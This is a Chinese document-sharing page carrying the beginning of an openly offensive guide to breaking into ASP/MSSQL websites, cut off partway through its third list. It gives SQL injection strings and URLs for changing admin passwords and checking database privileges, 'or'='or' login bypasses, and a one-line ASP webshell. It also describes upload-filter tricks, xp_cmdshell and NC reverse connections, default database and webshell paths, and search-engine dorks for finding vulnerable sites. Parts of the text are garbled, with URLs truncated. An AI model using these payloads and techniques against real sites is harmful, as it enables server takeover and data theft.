入侵网站服务器的方法

上传人:豆浆 文档编号:881627 上传时间:2017-05-20 格式:DOC 页数:16 大小:94.50KB
返回 下载 相关 举报
入侵网站服务器的方法_第1页
第1页 / 共16页
入侵网站服务器的方法_第2页
第2页 / 共16页
入侵网站服务器的方法_第3页
第3页 / 共16页
入侵网站服务器的方法_第4页
第4页 / 共16页
入侵网站服务器的方法_第5页
第5页 / 共16页
点击查看更多>>
资源描述

《入侵网站服务器的方法》由会员分享,可在线阅读,更多相关《入侵网站服务器的方法(16页珍藏版)》请在金锄头文库上搜索。

1、http:/ 入侵网站服务器的 8 种方法1、SQL 注入漏洞的入侵这种是里面 ASP+ACCESS 的网站入侵方式,通过注入点列出数据库管理员的帐号和密码信息,然后猜解出网站的后台地址,然后用帐号和密码登录进去找到文件上传的地方,把 ASP 木马上传上去,获得一个网站的 WEBSHELL。2、ASP 上传漏洞的利用这种技术方式是利用一些网站的 ASP 上传功能来上传 ASP 木马的一种入侵方式,不少网站都限制了上传文件的类型,一般来说 ASP 为后缀的文件都不允许上传,但是这种限制是可以被黑客突破的,黑客可以采取 COOKIE 欺骗的方式来上传 ASP 木马,获得网站的WEBSHELL 权限

2、。3、后台数据库备份方式获得 WEBSHELL这个主要是利用网站后台对 ACCESS 数据库进行数据库备份和恢复的功能,备份数据库路径等变量没有过滤导致可以把任何文件的后缀改成 ASP,那么利用网站上传的功能上传一个文件名改成 JPG 或者 GIF 后缀的 ASP 木马,然后用这个恢复库备份和恢复的功能把这个木马恢复成 ASP 文件,从而达到能够获取网站 WEBSHELL 控制权限的目的。4、 网站旁注入侵这种技术是通过 IP 绑定域名查询的功能查出服务器上有多少网站,然后通过一些薄弱的网站实施入侵,拿到权限之后转而控制服务器的其它网站。5、sa 注入点利用的入侵技术这种是 ASP+MSSQL

3、 网站的入侵方式,找到有 SA 权限的 SQL 注入点,然后用 SQL 数据库的XP_CMDSHELL 的存储扩展来运行系统命令建立系统级别的帐号,然后通过 3389 登录进去,或者在一台肉鸡上用 NC 开设一个监听端口,然后用 VBS 一句话木马下载一个 NC 到服务器里面,接着运行 NC 的反向连接命令,让服务器反向连接到远程肉鸡上,这样远程肉鸡就有了一个远程的系统管理员级别的控制权限。6、sa 弱密码的入侵技术这种方式是用扫描器探测 SQL 的帐号和密码信息的方式拿到 SA 的密码,然后用 SQLEXEC 之类的工具通过 1433 端口连接到远程服务器上,然后开设系统帐号,通过 3389

4、 登录。然后这种入侵方式还可以配合 WEBSHELL 来使用,一般的 ASP+MSSQL 网站通常会把 MSSQL 的连接密码写到一个配置文件当中,这个可以用 WEBSHELL 来读取配置文件里面的 SA 密码,然后可以上传一个 SQL 木马的方式来获取系统的控制权限。7、提交一句话木马的入侵方式这种技术方式是对一些数据库地址被改成 asp 文件的网站来实施入侵的。黑客通过网站的留言版,论坛系统等功能提交一句话木马到数据库里面,然后在木马客户端里面输入这个网站的数据库地址并提交,就可以把一个 ASP 木马写入到网站里面,获取网站的 WEBSHELL权限。8、 论坛漏洞利用入侵方式这种技术是利用

5、一些论坛存在的安全漏洞来上传 ASP 木马获得 WEBSHELL 权限,最典型的就是,动网 6.0 版本,7.0 版本都存在安全漏洞,拿 7.0 版本来说,注册一个正常的用户,然后用抓包工具抓取用户提交一个 ASP 文件的 COOKIE,然后用明小子之类的软件采取COOKIE 欺骗的上传方式就可以上传一个 ASP 木马,获得网站的 WEBSHELL。2 入侵网站的 14 种可利用方法 1.上传漏洞 upfile.asp, upload.asp,upload_flash.asp ,upfile_soft.asp,upfile_softpic.asppS: 如果看到:选择你要上传的文件 重新上传或

6、者出现“请登陆后使用” ,80%就有漏洞了! 有时上传不一定会成功,这是因为 Cookies 不一样.我们就要用 WSockExpert 取得 Cookies.再用 DOMAIN 上传。还有一些只是检测文件类型的,没有进行后缀名判断,这样的上传只需要把木马文件的开关加个 GIF89a 就可以通过了。而且可以上传任意文件,在 asp 和 测试中都可以上传。2.注入漏洞 pS:对 MD5 密码.有时我们不是哪么容易跑出来.如果是SQL 数据库.那么我们可以用以下命令: http:/注入网址;update admin set password=新 MD5 密码 where password=旧 MD

7、5密码- admin 为表名./看看是什么权限的,如果权限高的话,直接用 SQLTOOLS 进行连接就可以执行系统命令了。http:/注入网址 and 1=(Select IS_MEMBER(db_owner)http:/注入网址 And char(124)%2BCast(IS_MEMBER(db_owner) as varchar(1)%2Bchar(124)=1 ;-/检测是否有读取某数据库的权限http:/注入网址 and 1= (Select HAS_DBACCESS(master)http:/注入网址 And char(124)%2BCast(HAS_DBACCESS(master)

8、 as varchar(1)%2Bchar(124)=1 -3.旁注,也就是跨站我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了。4.暴库:把二级目录中间的/换成%5c eg:http:/ . s.asp?BigClassName=职责范围&BigClassType=1换成这样的形式提交:http:/ . s.asp?BigClassName=职责范围&BigClassType=1 如果你能看到:E:/ahttc040901/otherw

9、eb/dz/database/iXuEr_Studio.asa不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。 这样的就是数据库了。下载时用 FLASHGET 换成.MDB 格式的就行. 5.绕过密码验证直接进入后台or=or这是一个可以连接 SQL 的语名句.可以直接进入后台。我收集了一下。类似的还有: or= or a=a ) or (a=a ) or (a=a or 1=1- or a=a 6.社会工程学这个我们都知道吧。就是猜解。猜解一些人们常用的密码,比如他的生日啊,手机号码啊。办公电话啊等等。 。 :http:/ admin waishi .写入 A

10、SP 格式数据库就是一句话木马%execute request(value)% ,常用在留言本. :http:/ ASP 格式的数据库,再写入一句话木马,然后利用 ASP 后缀名的数据库进行写入木马。也提醒一下站长,MDB 数据库改为.asp 后缀也是不安全的。8.源码利用很多网站用的都是网上下载的源码,有的站长很懒,什么也不改。然后就上传开通网站了,像这样的网站只要知道他用的什么网站的源码做的,自己去网上下载一个,然后就有很多信息可以利用了。像数据库备份,网站后台啊,原始数据库路径啊,上传文件的路径啊等等,都可以进行利用。EY:http:/ 这个站用的是:杰出校友录,源码我下过了, 默认数据

11、库/webshell 路径:/database/liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是 admin 9.默认数据库/webshell 路径利用这样的网站很多/利人别人的 WEBSHELL. /Databackup/dvbbs7.MDB /bbs/Databackup/dvbbs7.MDB /bbs/Data/dvbbs7.MDB /data/dvbbs7.mdb /bbs/diy.asp /diy.asp /bbs/cmd.asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe 工具:网站猎手 挖掘鸡 EY:ht

12、tp:/ 10.查看目录法,有一些网站可以浏览目录,可以看到目录下所有的文件。 EY:http:/ http:/ 这样我们可以找到数据库,下载不用我教吧 11.工具溢出.asp?NewsID= /2j.asp?id=18 .asp?id=这种方法可以取得大量的 WEBSHELL 12.搜索引擎利用(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/ (2).找网站的管理后台地址: site:intext:管理 site:intitle:管理 关键字很多,自已找 site:inurl:login (3).查找 access

13、 的数据库,mssql、mysql 的连接文件 allinurl:bbsdata filetype:mdbinurl:database filetype:incconn inurl:datafiletype:mdb 13.COOKIE 诈骗把自己的 ID 修改成管理员的,MD5 密码也修改成他的,用桂林老兵工具可以修改 COOKIE。然后就直接登录有了网站后台管理员权限了。这个我就不多讲了 14.利用常见的漏洞,如动网 BBS EY:http:/ 可以先用:dvbbs 权限提升工具,使自已成为前台管理员。 THEN,运用:动网固顶贴工具,找个固顶贴,再取得 COOKIES,这个要你自已做。我们

14、可以用 WSockExpert 取得 Cookies/NC 包3 拿到 webshell 权限的 45 种方法1, 到 GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为 MSSQL 数据库!2, 到 Google ,site: inurl:asp3, 利用挖掘鸡和一个 ASP 木马. 文件名是 login.asp 路径组是/manage/ 关键词是 went.asp 用or=or来登陆4, 关键字:Co Net MIB Ver 1.0 网站后台管理系统帐号密码为 or=or5. 动感购物系统 inurl:help.asp 登陆,如未注册成为会员!upLoad_bm1.asp 和 upLoad_c1.asp 这两个随便选个,一般管理员都忽视了这 2 漏洞6。 默认数据库地址 blogdata/acblog.asa 关键字:acblog7. 百度 /htdocs 注册里可以直接上传 asa 文件!8. /Database/#newasp.mdb 关键词:NewAsp SiteManageSystem Version9. 用挖掘机 关键字:Powered by WEBBOY 页面:/upfile.asp10. baidu 中搜索关键字 Ver5.0 Build 0519 (存在上传漏洞)11. Upfile_Artic

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 行业资料 > 其它行业文档

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号